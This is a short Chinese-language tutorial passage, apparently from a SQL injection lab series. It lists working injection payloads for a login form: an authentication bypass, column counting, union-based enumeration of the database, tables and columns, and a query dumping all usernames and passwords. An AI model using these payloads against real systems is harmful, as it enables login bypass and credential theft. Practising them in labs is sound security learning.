0x00 前言
之前我们学习了这些知识。
0x01 小知识
1.万能登录
1' or 1=1 #2. 判断字段数
uname=123' order by 2 # &passwd=&submit=Submit3. 联合查询
uname=123' union select 1,2 # &passwd=&submit=Submit4.查询数据库具体信息
uname=123' union select version(),database() # &passwd=&submit=Submit
5. 查询当前数据库的所有表
uname=123' union select 1, group_concat(table_name)from information_schema.tables where table_schema=database() # &passwd=&submit=Submit6.查看表中的字段名
uname=123' union select 1, group_concat(column_name)from information_schema.columns where table_name='users' # &passwd=&submit=Submit7.输出所有的用户名和密码
uname=123' union select group_concat(username), group_concat(password) from users# &passwd=&submit=Submit